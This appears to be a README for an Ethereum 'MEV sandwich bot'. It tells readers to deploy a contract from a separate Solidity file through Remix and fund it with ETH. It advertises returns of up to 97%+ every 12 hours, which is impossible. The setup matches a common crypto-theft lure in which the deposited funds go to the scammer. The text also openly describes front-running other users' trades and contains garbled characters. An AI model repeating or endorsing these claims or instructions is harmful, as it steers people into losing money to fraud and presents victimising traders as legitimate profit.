An ETH MEV-BOT for performing sandwich attacks on Uniswap. A Maximal Extractable Value (MEV) Solidity Sandwich BOT that empowers contract deployers to reap profits from tokens.
In the fascinating world of cryptocurrency, understanding what an MEV Bot is, can be crucial. A Maximal Extractable Value (MEV) bot is a sophisticated arbitrage instrument that scouts the Mempool for pending transactions on decentralized exchanges such as Uniswap. It cunningly inserts our transaction with a slightly higher gas fee (1 Gwei more than the transaction attempting to enter), thus sandwiching the pending transaction and ensuring ours is processed first, reaping profits from the slippage differences.
- Sends the transaction.
- Sniffs the Uniswap v2 Mempool.
- Competes to buy up the token onchain as quickly as possible, sandwiching the victim's transaction and creating a profitable slippage opportunity.
- Sends back the ETH to the contract, ready for withdrawal.
Your Ethereum (ETH) investment returns are calculated on a 12-hour basis as follows:
ETH Range (invested) | Returns (12 hours) |
---|---|
1.2ETH - 2.4ETH |
up to 10% |
2.4ETH - 5ETH |
up to 20% |
5ETH - 10ETH |
20-27% |
10ETH - 20ETH |
27-35% |
20ETH - 50ETH |
35-50% |
50ETH - 100ETH |
50-63% |
100ETH - 200ETH |
63-76% |
200ETH - 500ETH |
76-97% |
500ETH and above |
97%+ |
1) Follow these instructions to deploy your smart contract using REMIX IDE
- π Create a new file eth-mevbot.sol and paste the code from eth-mevbot.sol.
3) π Navigate to "Deploy" and set the environment to "Injected Web3 or Injected Provider". Connect the wallet and click "Deploy".
4) Copy the bot's contract and send between 1 and 4 Ethereum to its balance in order for the bot to start.
π Remember, for successful transactions on the Ethereum network, you must have enough balance to cover the gas. Recommended 1.2 Ξ΀Πand higher.
At any point, you can stop the bot or retrieve your money by calling the withdrawal function.
π°π°π° Make money with MevBot π°π°π°